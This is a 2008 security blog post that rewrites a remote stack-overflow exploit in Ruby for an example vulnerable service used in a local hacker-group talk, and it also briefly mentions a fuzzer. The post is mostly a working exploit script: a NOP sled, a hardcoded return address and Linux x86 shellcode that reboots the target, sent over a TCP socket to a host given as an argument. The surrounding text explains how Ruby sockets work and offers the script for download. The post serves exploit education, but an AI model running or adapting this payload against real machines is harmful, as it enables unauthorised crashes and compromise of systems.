Home Projects Pictures Books About PGP Key

Remote Exploit Development in Ruby

February 13th, 2008 Anthony Towry

This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.

So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. This is informative, I had to adjust my payload size (no biggie) and do a #include <string.h>, but overall a solid example without errors.

Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns...they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit into Ruby and scratching the surface concerning Ruby sockets. It turns out that this is an extremely simple thing to do.

 
#!/usr/bin/ruby
# http://www.calculateddecision.com
 
require 'socket'
port = 7500
 
victim=ARGV[0]
nop = "\x90"
sled=nop*240
 
#This will probably be different for you
eip = "\xa8\xf9\xff\xbf"
 
#20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode="\x6a\x58"+
 
"\x58"+
"\xbb\xad\xde\xe1\xfe"+
"\xb9\x69\x19\x12\x28"+
"\xba\x67\x45\x23\x01"+
"\xcd\x80"
 
 payload=sled<<shellcode<<eip
if (ARGV.length<1)#Brief usage
puts "You have to give me a target"
else
mysocket=TCPSocket::new(victim,port)
mysocket.send(payload,0)
mysocket::close
 
end

As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually throw a domain name and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.

Looking at Preddy's perl example, these two forms don't really differ all that much and in fact, I'm not entirely sure that there isn't a simpler socket constructor available in perl (if nothing else CPAN). Even so, Ruby does IMHO offer a more inviting grammar.

You can download my send_overflow.rb here.

Notes:
xWinGs wrote a local ENV variable example

Posted in Programming, Security | 2 Comments »

Fuzzing Deeper in C with Bunny the Fuzzer

October 31st, 2007 Anthony Towry

Today on bugtraq Michal Zalewski , a noted security researcher who pounds out some pretty cool tools, posted a new fuzzer for the C language.  Bunny the Fuzzer is available through Google Code.

So, if you know me personally, you know that lately I've been pretty drawn to fuzzing and Read the rest of this entry »

Posted in Security, Testing | No Comments »

  • Recent Posts

    • New ProCheckUp ValidateRequest Bypass
    • Samurai Web Test Framework 0.1
    • Altering the Mac OS X Login Access Window Text
    • Summary on the State of Nmap
    • Android Security Team Says Hi

  • Archives

    • September 2008
    • August 2008
    • July 2008
    • June 2008
    • May 2008
    • April 2008
    • March 2008
    • February 2008
    • January 2008
    • December 2007
    • November 2007
    • October 2007
    • September 2007
    • August 2007
    • July 2007

  • Categories

    • Art
    • Books
    • Community
    • conferences
    • Hardware
    • Management
    • Operating Systems
    • Podcast
    • Programming
    • Projects
    • Security
    • Site News
    • Software
    • Testing
    • Uncategorized
    • Web development

  • Blogroll

    • Defcon 405
    • ha.ckers.org
    • Halvar Flake
    • OSVDB Blog
    • phed.org
    • Scott Berkun’s Blog

  • Tags

    .Net ASP.NET Beta Books browser buffer overflow C Community Compliance Concept conferences Credit Cards dc405 defcon Development exploit Future fuzzing hacking Linux malware Management Metasploit Microsoft oklahoma Open Source osvdb OS X Patterns PCI Perl Podcast Programming protocols Ruby secure coding Security Silverlight SQL Server Testing tools vulnerabilities vulnerability WordPress xss

Calculated Decision has Joomla! under the hood!

Podcast Powered by podPress (v8.8)